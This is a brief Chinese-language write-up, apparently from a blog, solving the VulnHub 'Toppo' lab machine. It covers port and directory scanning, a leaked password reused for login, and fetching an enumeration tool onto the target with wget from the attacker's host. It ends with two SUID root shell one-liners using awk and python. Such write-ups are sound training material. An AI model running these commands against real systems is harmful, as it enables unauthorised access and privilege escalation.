这个靶机主要是suid提权,相对简单,靶机下载:
官网链接:https://download.vulnhub.com/toppo/Toppo.zip
使用nmap和dirb进行web打点
nmap -sS 10.10.10.222 -p- -A -T4
dirsearch -u http://10.10.10.222/
web识别,是一个普通的html页面
whatweb http://10.10.10.222/
发现了一个密码信息 12345ted123
我们猜测账号就是那串密码夹着中间的英文ted
登录成功之后就是内网渗透,我们使用FeatherScan
进行内网信息收集
git clone https://github.com/baibaixiaoyu2024/FeatherScan.git
cd FeatherScan_v4_5_
python -m http.server
# 靶机
wget 10.10.10.130:8000/FeatherScan_v4_5
wget 10.10.10.130:8000/feather_vuln_db.txt
chmod +x FeatherScan_v4_5
./FeatherScan_v4_5
发现提权漏洞
得到两个提权向量,两个命令都可以用
awk 'BEGIN {system("/bin/sh")}'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换
至此提权成功!很简单吧
本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!THE END
暂无评论内容